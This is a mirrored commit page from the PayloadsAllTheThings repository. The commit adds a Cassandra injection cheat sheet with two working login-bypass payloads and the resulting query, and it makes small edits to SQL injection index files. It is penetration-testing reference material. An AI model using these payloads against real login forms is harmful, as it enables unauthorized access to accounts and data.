gitea-mirror/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-12-29 06:03:14 -08:00
Code Issues Packages Projects Releases Wiki Activity

Cassandra SQL + XSS MD + PHP Type Juggling

Browse Source
This commit is contained in:
Swissky
2018-09-10 20:40:43 +02:00
parent 90f4c3634e
commit 2a080f82e6
10 changed files with 101 additions and 12 deletions
Download Patch File Download Diff File Expand all files Collapse all files

37
SQL injection/Cassandra Injection.md Normal file
View File

@@ -0,0 +1,37 @@
# Cassandra Injection
> Apache Cassandra is a free and open-source distributed wide column store NoSQL database management system
## Cassandra comment
```sql
/* Cassandra Comment */
```
## Cassandra - Login Bypass
### Login Bypass 0
```sql
username: admin' ALLOW FILTERING; %00
password: ANY
```
### Login Bypass 1
```sql
username: admin'/*
password: */and pass>'
```
The injection would look like the following SQL query
```sql
SELECT * FROM users WHERE user = 'admin'/*' AND pass = '*/and pass>'' ALLOW FILTERING;
```
Example from EternalNoob : [https://hack2learn.pw/cassandra/login.php](https://hack2learn.pw/cassandra/login.php)
## Thanks to
* [Injection In Apache Cassandra Part I - Rodolfo - EternalNoobs](https://eternalnoobs.com/injection-in-apache-cassandra-part-i/)

2
SQL injection/MySQL Injection.md
View File

@@ -1,6 +1,6 @@
# MYSQL Injection
## MySQL
## MySQL
```sql
# MYSQL Comment

3
SQL injection/README.md
View File

@@ -1,6 +1,6 @@
# SQL injection
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application
A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
## Summary
@@ -9,6 +9,7 @@ A SQL injection attack consists of insertion or "injection" of a SQL query via t
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/OracleSQL%20Injection.md)
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/PostgreSQL%20Injection.md)
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/SQLite%20Injection.md)
* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20injection/Cassandra%20Injection.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)